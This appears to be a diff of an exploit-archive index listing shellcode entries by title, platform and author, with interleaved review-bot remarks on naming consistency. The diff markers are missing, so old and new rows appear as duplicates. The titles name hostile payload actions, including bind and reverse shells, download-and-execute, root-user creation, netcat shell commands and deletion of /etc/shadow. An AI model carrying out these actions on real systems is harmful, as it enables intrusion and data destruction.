13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind Shell Port 28876 Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0
13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0
13508,platforms/win_x86/shellcode/13508.asm,"Win32 - telnetbind by Winexec 23 port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0
13508,platforms/win_x86/shellcode/13508.asm,"Win32 - Winexec Telnet Bind 23 Port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0
13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0
13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0
13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0
13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0
13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0
13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download & Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0
13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download & Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
13518,platforms/win_x86/shellcode/13518.c,"Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0
13519,platforms/win_x86/shellcode/13519.c,"Win32 SP1/SP2 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode,0
13520,platforms/win_x86/shellcode/13520.c,"Win32/XP SP2 - Pop up message box Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0
13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0
13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download & Exec Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0
13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)",2004-10-25,lion,win_x86,shellcode,0
13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File and Exec Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0
13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - download and exec source Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell on port 58821 Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download & Exec Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell Port 58821 Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0
13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) download and execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) Download & Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0
13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) & execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) and cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
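Review bot: two garbled descriptions survive this hunk unchanged while their neighbours are renamed: 13496 "Solaris/SPARC - connect-bac Shellcode k (204 bytes)" has "Shellcode" spliced into the middle of "connect-back", and 13510 keeps "Sellcode cmd.exe Shellcode" even though the line is otherwise edited ("FR" to "(FR)"); both should be fixed here. 13508 "Winexec Telnet Bind 23 Port" puts the number before "Port", the opposite of every other rename in this commit ("Port 23"). Smaller: 13504 "Windows 5.0 < 7.0 x86" uses "<" as a range where the file otherwise writes "/" or "-", and 13499/13500 keep the "_" quoting artefact.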
@ -15785,8 +15792,8 @@ id,file,description,date,author,platform,type,port
13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0
13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0
13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0
13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0
13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - portbind (Port 1337) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0
13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to Allow TCP Traffic on Port 445 Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0
13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - Portbind Port 1337 Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0
13571,platforms/win_x86/shellcode/13571.c,"Win32/XP SP2 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0
13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) & exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0
13574,platforms/win_x86/shellcode/13574.c,"Win32/XP SP2 (EN + AR) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0
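Review bot: 13563 "overwrite MBR on /dev/sda with _LOL!'" opens the string with the underscore artefact and closes it with an apostrophe; since this commit already converts that pattern to quotes for 13523 ('slim'), the same should be done here ('LOL!'). 13566 is the only entry in the hunk with no size in parentheses, and 13569/13570 are renamed while 13571/13572/13574 around them keep the old lowercase action descriptions.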
@ -15794,25 +15801,25 @@ id,file,description,date,author,platform,type,port
13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0
13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - fork bomb Shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0
13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append '/etc/passwd' & exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0
13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0
13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 FR - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0
13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 (FR) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0
13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - polymorphic Shellcode ip6tables -F (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
13601,platforms/lin_x86/shellcode/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
13602,platforms/lin_x86/shellcode/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
13609,platforms/lin_x86/shellcode/13609.c,"Linux/x86 - bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode,0
13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 English - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 Turkish - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0
13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0
13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home Edition SP2 English - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home Edition SP3 English - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0
13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 ITA - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0
13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0
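Review bot: 13595 is edited ("FR" to "(FR)") but keeps "calc Shellcode", whereas the other calculator payloads in this hunk (13630, 13631, 13639) say "calc.exe"; make it "calc.exe" in the same edit. 13601/13602 use the platform prefix "Linux/i686" while every other lin_x86 entry uses "Linux/x86", and 13599 "polymorphic Shellcode ip6tables -F" has the action after "Shellcode" unlike its sibling 13600 "ip6tables -F Shellcode"; both are visible here and untouched.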
@ -15835,7 +15842,7 @@ id,file,description,date,author,platform,type,port
13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends 'Phuck3d!' to all terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0
13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0
13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0
13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 FR - Download and Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0
13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 (FR) - Download & Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0
13702,platforms/lin_x86/shellcode/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode,0
13703,platforms/lin_x86/shellcode/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0
@ -15845,7 +15852,7 @@ id,file,description,date,author,platform,type,port
13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0
13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0
13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0
13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - Polymorphic setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0
13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
@ -15859,14 +15866,14 @@ id,file,description,date,author,platform,type,port
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Netcat Connectback Port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0
13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0
13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0
13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password 'leet' Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
14116,platforms/arm/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0
14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0
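Review bot: the renamed 13943 row quotes its two values inconsistently: the password becomes 'leet' in single quotes while the user name stays as _shell-storm_ with the underscore placeholders. The other renames in this patch that touch the same kind of field (15063 'zrl', 15202 and 15203 'secuid0') convert both values to single quotes, and the existing 15616 and 17439 rows already read `Add root user 'shell-storm' with password 'toor'`; use the same form here, i.e. `Add root user 'shell-storm' with password 'leet'`.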
@ -15875,47 +15882,47 @@ id,file,description,date,author,platform,type,port
14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0
14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell Port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0
14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14234,platforms/linux/shellcode/14234.c,"Linux - 125 Bind Port 6778 XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0
14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Netcat BindShell Port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bindshell Port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14873,platforms/win_x86/shellcode/14873.asm,"Win32 - Shellcode Checksum Routine (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Admin _zrl_ Account Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0
15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Pro SP3 (EN) x86 - Add new local administrator _secuid0_ Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect UDP Port 68 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
15879,platforms/win_x86/shellcode/15879.txt,"Win32 - Speaking 'You got pwned!' Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0
16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 portbind + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0
16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 Portbind + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0
16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
